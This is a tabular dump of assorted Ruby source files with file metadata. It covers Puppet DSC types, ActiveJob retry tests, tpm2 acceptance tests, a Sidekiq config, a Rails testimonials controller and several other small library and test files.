hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
ac2505f59db85ea9d797282ded4fceba3b7fca05 | 410 | # encoding: utf-8
require_relative 'checker_transformer_base'
module Epuber
  # Transformer side of the checker/transformer hierarchy. Knows which
  # concrete transformer class handles each supported source type.
  class Transformer < CheckerTransformerBase
    require_relative 'transformer/text_transformer'
    # @return [Hash<Symbol, Class>] mapping of source-type symbol to the
    #   transformer class responsible for it; inherited entries from the
    #   base class are merged on top (base-class entries win on conflict,
    #   matching the original `{...}.merge(super)` order).
    def self.map_source_type__class
      own_mapping = {
        result_text_xhtml_string: TextTransformer,
        source_text_file: TextTransformer,
      }
      own_mapping.merge(super)
    end
  end
end
| 20.5 | 53 | 0.692683 |
ac820ecbb94e24df7d6aafac0c8bfb0ac4edbcdc | 173 | describe file('/etc/syslog.sumologic.pem') do
it { is_expected.not_to exist }
end
# The SumoLogic rsyslog forwarding config should also have been removed.
describe file('/etc/rsyslog.d/sumologic.conf') do
  it { is_expected.not_to exist }
end
| 21.625 | 49 | 0.734104 |
91ccb32de234a33f7b91aabf6e29cb71fc2c8dc8 | 5,208 | require 'pathname'
# Puppet type wrapping the SharePointDsc SPUserProfileServiceAppPermissions
# DSC resource. NOTE: this file is auto-generated from the MOF schema named
# in @doc below; fix the generator rather than hand-editing.
Puppet::Type.newtype(:dsc_spuserprofileserviceapppermissions) do
  require Pathname.new(__FILE__).dirname + '../../' + 'puppet/type/base_dsc'
  require Pathname.new(__FILE__).dirname + '../../puppet_x/puppetlabs/dsc_type_helpers'
  @doc = %q{
    The DSC SPUserProfileServiceAppPermissions resource type.
    Automatically generated from
    'SharePointDsc/DSCResources/MSFT_SPUserProfileServiceAppPermissions/MSFT_SPUserProfileServiceAppPermissions.schema.mof'
    To learn more about PowerShell Desired State Configuration, please
    visit https://technet.microsoft.com/en-us/library/dn249912.aspx.
    For more information about built-in DSC Resources, please visit
    https://technet.microsoft.com/en-us/library/dn249921.aspx.
    For more information about xDsc Resources, please visit
    https://github.com/PowerShell/DscResources.
  }
  # ProxyName is the only attribute the MOF schema marks as mandatory.
  validate do
    fail('dsc_proxyname is a required attribute') if self[:dsc_proxyname].nil?
  end
  # Metadata consumed by base_dsc when building the DSC invocation.
  def dscmeta_resource_friendly_name; 'SPUserProfileServiceAppPermissions' end
  def dscmeta_resource_name; 'MSFT_SPUserProfileServiceAppPermissions' end
  def dscmeta_module_name; 'SharePointDsc' end
  def dscmeta_module_version; '2.1.0.0' end
  newparam(:name, :namevar => true ) do
  end
  ensurable do
    newvalue(:exists?) { provider.exists? }
    newvalue(:present) { provider.create }
    defaultto { :present }
  end
  # Name: PsDscRunAsCredential
  # Type: MSFT_Credential
  # IsMandatory: False
  # Values: None
  newparam(:dsc_psdscrunascredential) do
    def mof_type; 'MSFT_Credential' end
    def mof_is_embedded?; true end
    desc "PsDscRunAsCredential"
    validate do |value|
      unless value.kind_of?(Hash)
        fail("Invalid value '#{value}'. Should be a hash")
      end
      PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("Credential", value)
    end
  end
  # Name: ProxyName
  # Type: string
  # IsMandatory: True
  # Values: None
  newparam(:dsc_proxyname) do
    def mof_type; 'string' end
    def mof_is_embedded?; false end
    desc "ProxyName - The name of the proxy that is attached to the user profile service you wish to set permissions for"
    isrequired
    validate do |value|
      unless value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string")
      end
    end
  end
  # Name: CreatePersonalSite
  # Type: string[]
  # IsMandatory: False
  # Values: None
  newparam(:dsc_createpersonalsite, :array_matching => :all) do
    def mof_type; 'string[]' end
    def mof_is_embedded?; false end
    desc "CreatePersonalSite - A list of user principals that will have the Create personal site permission"
    validate do |value|
      unless value.kind_of?(Array) || value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string or an array of strings")
      end
    end
    # Normalize a scalar string to a one-element array.
    munge do |value|
      Array(value)
    end
  end
  # Name: FollowAndEditProfile
  # Type: string[]
  # IsMandatory: False
  # Values: None
  newparam(:dsc_followandeditprofile, :array_matching => :all) do
    def mof_type; 'string[]' end
    def mof_is_embedded?; false end
    desc "FollowAndEditProfile - A list of user principals that will have the Follow users and edit profile permission"
    validate do |value|
      unless value.kind_of?(Array) || value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string or an array of strings")
      end
    end
    munge do |value|
      Array(value)
    end
  end
  # Name: UseTagsAndNotes
  # Type: string[]
  # IsMandatory: False
  # Values: None
  newparam(:dsc_usetagsandnotes, :array_matching => :all) do
    def mof_type; 'string[]' end
    def mof_is_embedded?; false end
    desc "UseTagsAndNotes - A list of user principals that will have the Use tags and notes permission"
    validate do |value|
      unless value.kind_of?(Array) || value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string or an array of strings")
      end
    end
    munge do |value|
      Array(value)
    end
  end
  # Name: InstallAccount
  # Type: MSFT_Credential
  # IsMandatory: False
  # Values: None
  newparam(:dsc_installaccount) do
    def mof_type; 'MSFT_Credential' end
    def mof_is_embedded?; true end
    desc "InstallAccount - POWERSHELL 4 ONLY: The account to run this resource as, use PsDscRunAsCredential if using PowerShell 5"
    validate do |value|
      unless value.kind_of?(Hash)
        fail("Invalid value '#{value}'. Should be a hash")
      end
      PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("InstallAccount", value)
    end
  end
  # Extends the autorequire graph so a pending reboot resource is ordered
  # correctly relative to this DSC resource.
  def builddepends
    pending_relations = super()
    PuppetX::Dsc::TypeHelpers.ensure_reboot_relationship(self, pending_relations)
  end
end
# PowerShell provider for the type above. Confined to hosts whose reported
# powershell_version is at least 5.0.10586.117 (minimum for reliable DSC
# invocation) and defaulted on Windows.
Puppet::Type.type(:dsc_spuserprofileserviceapppermissions).provide :powershell, :parent => Puppet::Type.type(:base_dsc).provider(:powershell) do
  confine :true => (Gem::Version.new(Facter.value(:powershell_version)) >= Gem::Version.new('5.0.10586.117'))
  defaultfor :operatingsystem => :windows
  mk_resource_methods
end
| 33.384615 | 144 | 0.690092 |
18e015cf2fcec18660a515dc4485251b79bbde60 | 49 | module NvdFeedApi
VERSION = '0.3.1'.freeze
end
| 12.25 | 26 | 0.714286 |
f8a056b5122fd62276d25fdc7c6c5987454adf2a | 1,761 | require 'spec_helper'
# Unit specs for Runaround::MethodCall, a Struct that captures a single
# method invocation: name, positional args, option hash, block, and the
# eventual return value.
describe Runaround::MethodCall do
  context 'struct members' do
    subject { described_class.new }
    it { is_expected.to respond_to :method }
    it { is_expected.to respond_to :args }
    it { is_expected.to respond_to :opts }
    it { is_expected.to respond_to :block }
    it { is_expected.to respond_to :return_value }
    # Member order matters because the struct can be splatted positionally.
    it 'are in the correct order' do
      expect(subject.members).to eql [
        :method, :args, :opts, :block, :return_value]
    end
  end
  describe '.argsopts' do
    let(:mc) { described_class.new }
    it 'appends the opts to the args when both exist' do
      mc.args = [1,2,3]
      mc.opts = { a: 'a', b: 'b' }
      expect(mc.argsopts).to eql [1,2,3,{a: 'a', b: 'b'}]
    end
    it 'creates a new array when the args are nil' do
      mc.opts = { a: 'a', b: 'b' }
      expect(mc.argsopts).to eql [{a: 'a', b: 'b'}]
    end
    it 'does not add the opts when nil' do
      mc.args = [:foo]
      expect(mc.argsopts).to eql [:foo]
    end
    it 'does not add the opts when empty' do
      mc.args = [:foo]
      mc.opts = {}
      expect(mc.argsopts).to eql [:foo]
    end
    # argsopts must return a defensive copy of the args array...
    it 'does not share the same array as the input args' do
      mc.args = ['a']
      result = mc.argsopts
      mc.args << 'b'
      expect(mc.args).to eql ['a', 'b']
      expect(result).to eql ['a']
    end
    # ...but intentionally shares the opts hash itself.
    it 'does share the same opts hash' do
      mc.opts = { a: 1 }
      result = mc.argsopts
      mc.opts[:b] = 2
      expect(mc.opts).to eql({ a: 1, b: 2 })
      expect(result).to eql([{ a: 1, b: 2 }])
    end
  end
  describe '.run_method' do
    let(:mc) { described_class.new }
    # run_method hands control back to the coordinating Fiber.
    it 'calls out to Fiber.yield' do
      expect(Fiber).to receive(:yield)
      mc.run_method
    end
  end
end
| 24.458333 | 59 | 0.574106 |
b9a1e559d46e2e3244fdcb3a5081aa890d97a28d | 1,669 | require 'rbconfig'
require 'timeout'
# Runner for the bundled-gem test suites. Reads gem names from
# gems/bundled_gems, runs each gem's `rake test` in its source tree, and
# exits non-zero if any gem (not listed in the allow-failures env var) fails.
# Comma-separated list of gems whose failures should not fail the run.
allowed_failures = ENV['TEST_BUNDLED_GEMS_ALLOW_FAILURES'] || ''
allowed_failures = allowed_failures.split(',').reject(&:empty?)
rake = File.realpath("../../.bundle/bin/rake", __FILE__)
gem_dir = File.realpath('../../gems', __FILE__)
exit_code = 0
ruby = ENV['RUBY'] || RbConfig.ruby
failed = []
File.foreach("#{gem_dir}/bundled_gems") do |line|
  next if /^\s*(?:#|$)/ =~ line # skip comments and blank lines
  gem = line.split.first
  # Optional ARGV glob patterns restrict which gems are tested.
  next if ARGV.any? {|pat| !File.fnmatch?(pat, gem)}
  puts "\nTesting the #{gem} gem"
  test_command = "#{ruby} -C #{gem_dir}/src/#{gem} -Ilib #{rake} test"
  first_timeout = 600 # 10min
  # rbs needs its parser generated first and runs extra, slower suites.
  if gem == "rbs"
    racc = File.realpath("../../libexec/racc", __FILE__)
    pid = Process.spawn("#{ruby} -C #{gem_dir}/src/#{gem} -Ilib #{racc} -v -o lib/rbs/parser.rb lib/rbs/parser.y")
    Process.waitpid(pid)
    test_command << " stdlib_test validate"
    first_timeout *= 3
  end
  puts test_command
  # Spawn in its own process group so escalating signals reach children too.
  pid = Process.spawn(test_command, "#{/mingw|mswin/ =~ RUBY_PLATFORM ? 'new_' : ''}pgroup": true)
  # Wait up to first_timeout, then escalate: INT (30s grace), TERM (10s),
  # finally KILL. Signals target the process group (negative pid via "-SIG").
  {nil => first_timeout, INT: 30, TERM: 10, KILL: nil}.each do |sig, sec|
    if sig
      puts "Sending #{sig} signal"
      Process.kill("-#{sig}", pid)
    end
    begin
      break Timeout.timeout(sec) {Process.wait(pid)}
    rescue Timeout::Error
    end
  end
  unless $?.success?
    puts "Tests failed with exit code #{$?.exitstatus}"
    if allowed_failures.include?(gem)
      puts "Ignoring test failures for #{gem} due to \$TEST_BUNDLED_GEMS_ALLOW_FAILURES"
    else
      failed << gem
      # Exit code reflects the most recent non-allowed failure.
      exit_code = $?.exitstatus
    end
  end
end
puts "Failed gems: #{failed.join(', ')}" unless failed.empty?
exit exit_code
| 29.803571 | 114 | 0.641102 |
ed8af70b9206c243deafc0aa4c60cbd60237e031 | 678 | require 'yaml'
require 'sidekiq'
# Rack config for the Sidekiq web UI. Reads Redis connection settings and
# the session secret from ../config.yml relative to this file.
settings_path = File.dirname(__FILE__) + '/../config.yml'
fail "Configuration file #{settings_path} missing!" unless File.exist?(settings_path)
CONFIG = YAML.load_file(settings_path)
# Factory invoked once per pool checkout to open a Redis connection.
build_redis = proc {
  Redis.new(
    driver: :hiredis,
    host: CONFIG['redis']['host'],
    port: CONFIG['redis']['port'],
    db: CONFIG['redis']['db'],
    network_timeout: 5
  )
}
Sidekiq.configure_client do |config|
  config.redis = ConnectionPool.new(size: 27, &build_redis)
end
require 'sidekiq/web'
# Cookie-based sessions are required for CSRF protection in the web UI.
Sidekiq::Web.use Rack::Session::Cookie, :secret => CONFIG['secret']
# Rotate the session middleware to the front of the stack.
Sidekiq::Web.instance_eval { @middleware.rotate!(-1) }
run Sidekiq::Web
| 24.214286 | 86 | 0.676991 |
91bdcec55a4d5f1268eac28bc05de38ee82cdf4b | 1,459 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-mediaconnect/types'
require_relative 'aws-sdk-mediaconnect/client_api'
require_relative 'aws-sdk-mediaconnect/client'
require_relative 'aws-sdk-mediaconnect/errors'
require_relative 'aws-sdk-mediaconnect/waiters'
require_relative 'aws-sdk-mediaconnect/resource'
require_relative 'aws-sdk-mediaconnect/customizations'
# This module provides support for AWS MediaConnect. This module is available in the
# `aws-sdk-mediaconnect` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# media_connect = Aws::MediaConnect::Client.new
# resp = media_connect.add_flow_outputs(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from AWS MediaConnect are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::MediaConnect::Errors::ServiceError
# # rescues all AWS MediaConnect API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::MediaConnect
  # Version of the generated aws-sdk-mediaconnect gem.
  GEM_VERSION = '1.32.0'
end
| 26.527273 | 84 | 0.755312 |
0304c5612493dab74dd58c242de4f2b716e998ad | 9,468 | # frozen_string_literal: true
require "helper"
require "jobs/retry_job"
require "models/person"
require "minitest/mock"
# Tests for Active Job's retry_on/discard_on machinery: retry counters
# (shared vs. per-declaration), jitter, custom wait strategies, discard
# handlers, and backwards compatibility with jobs enqueued by Rails 5.2
# (which lack exception_executions). RetryJob logs each attempt into
# JobBuffer, so assertions compare against the buffered messages.
class ExceptionsTest < ActiveSupport::TestCase
  setup do
    JobBuffer.clear
    # These tests rely on scheduled (delayed) retries, which some adapters
    # cannot express; see adapter_skips_scheduling? below.
    skip if adapter_skips_scheduling?(ActiveJob::Base.queue_adapter)
  end
  test "successfully retry job throwing exception against defaults" do
    RetryJob.perform_later "DefaultsError", 5
    assert_equal [
      "Raised DefaultsError for the 1st time",
      "Raised DefaultsError for the 2nd time",
      "Raised DefaultsError for the 3rd time",
      "Raised DefaultsError for the 4th time",
      "Successfully completed job" ], JobBuffer.values
  end
  test "successfully retry job throwing exception against higher limit" do
    RetryJob.perform_later "ShortWaitTenAttemptsError", 9
    assert_equal 9, JobBuffer.values.count
  end
  # Multiple exception classes in one retry_on share a single counter.
  test "keeps the same attempts counter for several exceptions listed in the same retry_on declaration" do
    exceptions_to_raise = %w(FirstRetryableErrorOfTwo FirstRetryableErrorOfTwo FirstRetryableErrorOfTwo
                             SecondRetryableErrorOfTwo SecondRetryableErrorOfTwo)
    assert_raises SecondRetryableErrorOfTwo do
      RetryJob.perform_later(exceptions_to_raise, 5)
      assert_equal [
        "Raised FirstRetryableErrorOfTwo for the 1st time",
        "Raised FirstRetryableErrorOfTwo for the 2nd time",
        "Raised FirstRetryableErrorOfTwo for the 3rd time",
        "Raised SecondRetryableErrorOfTwo for the 4th time",
        "Raised SecondRetryableErrorOfTwo for the 5th time",
      ], JobBuffer.values
    end
  end
  # Separate retry_on declarations each get their own counter.
  test "keeps a separate attempts counter for each individual retry_on declaration" do
    exceptions_to_raise = %w(DefaultsError DefaultsError DefaultsError DefaultsError
                             FirstRetryableErrorOfTwo FirstRetryableErrorOfTwo FirstRetryableErrorOfTwo)
    assert_nothing_raised do
      RetryJob.perform_later(exceptions_to_raise, 10)
      assert_equal [
        "Raised DefaultsError for the 1st time",
        "Raised DefaultsError for the 2nd time",
        "Raised DefaultsError for the 3rd time",
        "Raised DefaultsError for the 4th time",
        "Raised FirstRetryableErrorOfTwo for the 5th time",
        "Raised FirstRetryableErrorOfTwo for the 6th time",
        "Raised FirstRetryableErrorOfTwo for the 7th time",
        "Successfully completed job"
      ], JobBuffer.values
    end
  end
  test "failed retry job when exception kept occurring against defaults" do
    RetryJob.perform_later "DefaultsError", 6
    assert_equal "Raised DefaultsError for the 5th time", JobBuffer.last_value
  rescue DefaultsError
    pass
  end
  test "failed retry job when exception kept occurring against higher limit" do
    RetryJob.perform_later "ShortWaitTenAttemptsError", 11
    assert_equal "Raised ShortWaitTenAttemptsError for the 10th time", JobBuffer.last_value
  rescue ShortWaitTenAttemptsError
    pass
  end
  test "discard job" do
    RetryJob.perform_later "DiscardableError", 2
    assert_equal "Raised DiscardableError for the 1st time", JobBuffer.last_value
  end
  test "custom handling of discarded job" do
    RetryJob.perform_later "CustomDiscardableError", 2
    assert_equal "Dealt with a job that was discarded in a custom way. Message: CustomDiscardableError", JobBuffer.last_value
  end
  test "custom handling of job that exceeds retry attempts" do
    RetryJob.perform_later "CustomCatchError", 6
    assert_equal "Dealt with a job that failed to retry in a custom way after 6 attempts. Message: CustomCatchError", JobBuffer.last_value
  end
  # Kernel.rand is stubbed below so the jitter term is deterministic.
  test "long wait job" do
    travel_to Time.now
    random_amount = 1
    Kernel.stub(:rand, random_amount) do
      RetryJob.perform_later "LongWaitError", 2, :log_scheduled_at
      assert_equal [
        "Raised LongWaitError for the 1st time",
        "Next execution scheduled at #{(Time.now + 3600.seconds + random_amount).to_f}",
        "Successfully completed job"
      ], JobBuffer.values
    end
  end
  test "exponentially retrying job includes jitter" do
    travel_to Time.now
    random_amount = 2
    Kernel.stub(:rand, random_amount) do
      RetryJob.perform_later "ExponentialWaitTenAttemptsError", 5, :log_scheduled_at
      assert_equal [
        "Raised ExponentialWaitTenAttemptsError for the 1st time",
        "Next execution scheduled at #{(Time.now + 3.seconds + random_amount).to_f}",
        "Raised ExponentialWaitTenAttemptsError for the 2nd time",
        "Next execution scheduled at #{(Time.now + 18.seconds + random_amount).to_f}",
        "Raised ExponentialWaitTenAttemptsError for the 3rd time",
        "Next execution scheduled at #{(Time.now + 83.seconds + random_amount).to_f}",
        "Raised ExponentialWaitTenAttemptsError for the 4th time",
        "Next execution scheduled at #{(Time.now + 258.seconds + random_amount).to_f}",
        "Successfully completed job"
      ], JobBuffer.values
    end
  end
  test "retry jitter uses value from ActiveJob::Base.retry_jitter by default" do
    old_jitter = ActiveJob::Base.retry_jitter
    ActiveJob::Base.retry_jitter = 4.0
    travel_to Time.now
    # rand is stubbed as identity so the jitter contribution is exact.
    Kernel.stub(:rand, ->(arg) { arg }) do
      RetryJob.perform_later "ExponentialWaitTenAttemptsError", 5, :log_scheduled_at
      assert_equal [
        "Raised ExponentialWaitTenAttemptsError for the 1st time",
        "Next execution scheduled at #{(Time.now + 7.seconds).to_f}",
        "Raised ExponentialWaitTenAttemptsError for the 2nd time",
        "Next execution scheduled at #{(Time.now + 82.seconds).to_f}",
        "Raised ExponentialWaitTenAttemptsError for the 3rd time",
        "Next execution scheduled at #{(Time.now + 407.seconds).to_f}",
        "Raised ExponentialWaitTenAttemptsError for the 4th time",
        "Next execution scheduled at #{(Time.now + 1282.seconds).to_f}",
        "Successfully completed job"
      ], JobBuffer.values
    end
  ensure
    ActiveJob::Base.retry_jitter = old_jitter
  end
  test "custom wait retrying job" do
    travel_to Time.now
    RetryJob.perform_later "CustomWaitTenAttemptsError", 5, :log_scheduled_at
    assert_equal [
      "Raised CustomWaitTenAttemptsError for the 1st time",
      "Next execution scheduled at #{(Time.now + 2.seconds).to_f}",
      "Raised CustomWaitTenAttemptsError for the 2nd time",
      "Next execution scheduled at #{(Time.now + 4.seconds).to_f}",
      "Raised CustomWaitTenAttemptsError for the 3rd time",
      "Next execution scheduled at #{(Time.now + 6.seconds).to_f}",
      "Raised CustomWaitTenAttemptsError for the 4th time",
      "Next execution scheduled at #{(Time.now + 8.seconds).to_f}",
      "Successfully completed job"
    ], JobBuffer.values
  end
  test "use individual execution timers when calculating retry delay" do
    travel_to Time.now
    exceptions_to_raise = %w(ExponentialWaitTenAttemptsError CustomWaitTenAttemptsError ExponentialWaitTenAttemptsError CustomWaitTenAttemptsError)
    random_amount = 1
    Kernel.stub(:rand, random_amount) do
      RetryJob.perform_later exceptions_to_raise, 5, :log_scheduled_at
      assert_equal [
        "Raised ExponentialWaitTenAttemptsError for the 1st time",
        "Next execution scheduled at #{(Time.now + 3.seconds + random_amount).to_f}",
        "Raised CustomWaitTenAttemptsError for the 2nd time",
        "Next execution scheduled at #{(Time.now + 2.seconds).to_f}",
        "Raised ExponentialWaitTenAttemptsError for the 3rd time",
        "Next execution scheduled at #{(Time.now + 18.seconds + random_amount).to_f}",
        "Raised CustomWaitTenAttemptsError for the 4th time",
        "Next execution scheduled at #{(Time.now + 4.seconds).to_f}",
        "Successfully completed job"
      ], JobBuffer.values
    end
  end
  test "successfully retry job throwing one of two retryable exceptions" do
    RetryJob.perform_later "SecondRetryableErrorOfTwo", 3
    assert_equal [
      "Raised SecondRetryableErrorOfTwo for the 1st time",
      "Raised SecondRetryableErrorOfTwo for the 2nd time",
      "Successfully completed job" ], JobBuffer.values
  end
  test "discard job throwing one of two discardable exceptions" do
    RetryJob.perform_later "SecondDiscardableErrorOfTwo", 2
    assert_equal [ "Raised SecondDiscardableErrorOfTwo for the 1st time" ], JobBuffer.values
  end
  test "successfully retry job throwing DeserializationError" do
    RetryJob.perform_later Person.new(404), 5
    assert_equal ["Raised ActiveJob::DeserializationError for the 5 time"], JobBuffer.values
  end
  # Legacy payloads: Rails 5.2 jobs carried no exception_executions hash.
  test "running a job enqueued by AJ 5.2" do
    job = RetryJob.new("DefaultsError", 6)
    job.exception_executions = nil # This is how jobs from Rails 5.2 will look
    assert_raises DefaultsError do
      job.enqueue
    end
    assert_equal 5, JobBuffer.values.count
  end
  test "running a job enqueued and attempted under AJ 5.2" do
    job = RetryJob.new("DefaultsError", 6)
    # Fake 4 previous executions under AJ 5.2
    job.exception_executions = nil
    job.executions = 4
    assert_raises DefaultsError do
      job.enqueue
    end
    assert_equal ["Raised DefaultsError for the 5th time"], JobBuffer.values
  end
  private
    # True for adapters that execute inline / in-process and therefore
    # cannot honor scheduled (delayed) retries.
    def adapter_skips_scheduling?(queue_adapter)
      [
        ActiveJob::QueueAdapters::InlineAdapter,
        ActiveJob::QueueAdapters::AsyncAdapter,
        ActiveJob::QueueAdapters::SneakersAdapter
      ].include?(queue_adapter.class)
    end
end
| 37.571429 | 147 | 0.721694 |
21e406100b5bfb4c6e507c7d3e5cb0127b5f7aa5 | 453 | # frozen_string_literal: true
# Copyright (c) 2008-2013 Michael Dvorkin and contributors.
#
# Fat Free CRM is freely distributable under the terms of MIT license.
# See MIT-LICENSE file or http://www.opensource.org/licenses/mit-license.php
#------------------------------------------------------------------------------
# Factory for FatFreeCrm::List records with placeholder name/URL values.
FactoryBot.define do
  factory :list, class: FatFreeCrm::List do
    name { "Foo List" }
    url { "/controller/action" }
  end
end
| 32.357143 | 79 | 0.604857 |
33b7ad205683fea785adbbd710dc102ef43b4936 | 59 | class Issue < ActiveRecord::Base
belongs_to :project
end
| 14.75 | 32 | 0.779661 |
e9fc6006c5fe137a42c55f6786d8dffb9e5df410 | 3,464 | require 'spec_helper_acceptance'
require 'yaml'
RUN_IN_PARALLEL = ENV.fetch('BEAKER_RUN_IN_PARALLEL', '')
.split(',').include?('tests')
test_name 'tpm2 class'
# Acceptance tests for the tpm2 Puppet class, run against the IBM TPM2
# simulator via Beaker. Verifies install, idempotency, the tpm2-abrmd
# service, and the structured tpm2 facter fact.
describe 'tpm2 class' do
  # Hieradata for tpm2-abrmd >= 2.x (new --tcti option syntax).
  let(:tpm2_abrmd2_hieradata) do
    {
      # Required to use the IBM simulator
      'tpm2::tabrm_options' => ['--tcti=/usr/lib64/libtss2-tcti-mssim.so.0']
    }
  end
  # Hieradata for tpm2-abrmd 1.x (legacy -t option syntax).
  let(:tpm2_abrmd1_hieradata) do
    {
      # Required to use the IBM simulator
      'tpm2::tabrm_options' => ['-t socket']
    }
  end
  let(:manifest) do
    <<-MANIFEST
      include 'tpm2'
    MANIFEST
  end
  hosts.each do |host|
    context "on #{host} with tpm" do
      it 'should install tpm2-abrmd' do
        install_package(host, 'tpm2-abrmd')
      end
      it 'should install and start the TPM2 simulator' do
        install_package(host, 'simp-tpm2-simulator')
        on(host, 'puppet resource service simp-tpm2-simulator ensure=running enable=true')
      end
      # TODO: Undo this when
      # https://github.com/tpm2-software/tpm2-abrmd/pull/680/files makes it into
      # mainline
      it 'should disable selinux for testing' do
        on(host, 'setenforce 0')
      end
      # Pick the hieradata matching the installed tpm2-abrmd major version.
      it 'should set the hieradata appropriately' do
        tpm2_abrmd_version = on(host, 'tpm2-abrmd --version').stdout.split(/\s+/).last
        if tpm2_abrmd_version
          if tpm2_abrmd_version.split('.').first.to_i > 1
            set_hieradata_on(host, tpm2_abrmd2_hieradata)
          else
            set_hieradata_on(host, tpm2_abrmd1_hieradata)
          end
        end
      end
    end
  end
  context 'with default settings' do
    it 'should apply with no errors' do
      apply_manifest_on(hosts, manifest, run_in_parallel: RUN_IN_PARALLEL)
      apply_manifest_on(
        hosts, manifest,
        catch_failures: true,
        run_in_parallel: RUN_IN_PARALLEL
      )
    end
    it 'should be idempotent' do
      sleep 20
      apply_manifest_on(
        hosts, manifest,
        catch_changes: true,
        run_in_parallel: RUN_IN_PARALLEL
      )
    end
    # If you're troubleshooting this, there are a few things that have stopped
    # the tpm2-adbrmd service from starting:
    #   - selinux denies with AVC/USER_AVC:
    #     (check with `ausearch -i -m avc,user_avc -ts recent`):
    #     - tpm2-tabrmd from opening a socket
    #     - tpm2-tabrmd from connecting to the (unconfined) tpm2-simulator
    #   - dbus is confused
    #     (check with `journalctl -xe | grep -i dbus)`:
    #     - tpm2-tabrmd service dies immediately after systemctl reports it
    #       started successfully; no AVC problems reported
    it 'should be running the tpm2-abrmd service' do
      hosts.entries.each do |host|
        stdout = on(host, 'puppet resource service tpm2-abrmd --to_yaml').stdout
        service = YAML.safe_load(stdout)['service']['tpm2-abrmd']
        # BUG FIX: the original used `expect { value.to eq ... }` — a block
        # expectation with no matcher, whose block is never executed, so the
        # assertion was a silent no-op. Use a value expectation instead.
        expect(service['ensure']).to eq 'running'
      end
    end
    it 'should query tpm2 information with facter' do
      hosts.entries.each do |host|
        stdout = on(host, 'facter -p -y tpm2 --strict').stdout
        fact = YAML.safe_load(stdout)['tpm2']
        # BUG FIX: same no-op `expect { ... }` pattern as above — these four
        # checks never ran. Converted to value expectations.
        expect(fact['tpm2_getcap']).to be_a Hash
        expect(fact['tpm2_getcap']['properties-fixed']).to be_a Hash
        expect(fact['tpm2_getcap']['properties-fixed']['TPM_PT_FAMILY_INDICATOR']['as string']).to eq '2.0'
        expect(fact['manufacturer']).to eq 'IBM '
      end
    end
  end
end
| 30.121739 | 109 | 0.630774 |
260ab1aa54dcf27da5017e33b099b2b1624168a8 | 3,683 | class TestimonialsController < ApplicationController
before_filter :except => :index do |controller|
controller.ensure_logged_in t("layouts.notifications.you_must_log_in_to_give_feedback")
end
before_filter :ensure_authorized_to_give_feedback, :except => :index
before_filter :ensure_feedback_not_given, :except => :index
# Skip auth token check as current jQuery doesn't provide it automatically
skip_before_filter :verify_authenticity_token, :only => [:skip]
def index
username = params[:person_id]
target_user = Person.find_by!(username: username, community_id: @current_community.id)
if request.xhr?
@testimonials = TestimonialViewUtils.received_testimonials_in_community(target_user, @current_community).paginate(:per_page => params[:per_page], :page => params[:page])
limit = params[:per_page].to_i
render :partial => "people/testimonials", :locals => {:received_testimonials => @testimonials, :limit => limit}
else
redirect_to person_path(target_user)
end
end
def new
transaction = Transaction.find(params[:message_id])
testimonial = Testimonial.new
render(locals: { transaction: transaction, testimonial: testimonial})
end
def create
testimonial_params = params.require(:testimonial).permit(
:text,
:grade,
).merge(
receiver_id: @transaction.other_party(@current_user).id,
author_id: @current_user.id
)
@testimonial = @transaction.testimonials.build(testimonial_params)
if @testimonial.save
Delayed::Job.enqueue(TestimonialGivenJob.new(@testimonial.id, @current_community))
flash[:notice] = t("layouts.notifications.feedback_sent_to", :target_person => view_context.link_to(@transaction.other_party(@current_user).given_name_or_username, @transaction.other_party(@current_user))).html_safe
redirect_to person_transaction_path(:person_id => @current_user.id, :id => @transaction.id)
else
render :action => new
end
end
def skip
is_author = @transaction.author == @current_user
if is_author
@transaction.update_attributes(author_skipped_feedback: true)
else
@transaction.update_attributes(starter_skipped_feedback: true)
end
respond_to do |format|
format.html {
flash[:notice] = t("layouts.notifications.feedback_skipped")
redirect_to single_conversation_path(:conversation_type => "received", :person_id => @current_user.id, :id => @transaction.id)
}
format.js { render :layout => false, locals: {is_author: is_author} }
end
end
private
def ensure_authorized_to_give_feedback
# Rails was giving some read-only records. That's why we have to do some manual queries here and use INCLUDES,
# not joins.
# TODO Move this to service
@transaction = Transaction
.includes(:listing)
.where("starter_id = ? OR listings.author_id = ?", @current_user.id, @current_user.id)
.where({
community_id: @current_community.id,
id: params[:message_id]
})
.references(:listing)
.first
if @transaction.nil?
flash[:error] = t("layouts.notifications.you_are_not_allowed_to_give_feedback_on_this_transaction")
redirect_to root and return
end
end
def ensure_feedback_not_given
transaction_entity = MarketplaceService::Transaction::Entity.transaction(@transaction)
waiting = MarketplaceService::Transaction::Entity.waiting_testimonial_from?(transaction_entity, @current_user.id)
unless waiting
flash[:error] = t("layouts.notifications.you_have_already_given_feedback_about_this_event")
redirect_to root and return
end
end
end
| 35.757282 | 221 | 0.725224 |
21ced22c0458e4cd3a25345d1b8887619a172bdf | 582 | module Oauth
module Controller
module Helper
extend ActiveSupport::Concern
included do
helper_method :require_access_token
end
def require_access_token
if token && token.valid?
true
else
respond_to do |format|
format.html { head :unauthorized }
format.json { render json: Oauth::Error::Unauthorized.to_json, status: 401 }
end
end
end
private
def token
Oauth::Token.find_by(token: params[:access_token])
end
end
end
end | 20.785714 | 88 | 0.579038 |
f776421d4fd40ce124b0031fe488c19ab33d60dc | 202 | #
# Cookbook Name:: mchx_dk
# Recipe:: zero
#
# Copyright (c) 2016 The Authors, All Rights Reserved.
# Compose the workstation setup from its component recipes, in order.
%w[chef_dk installs user].each do |component|
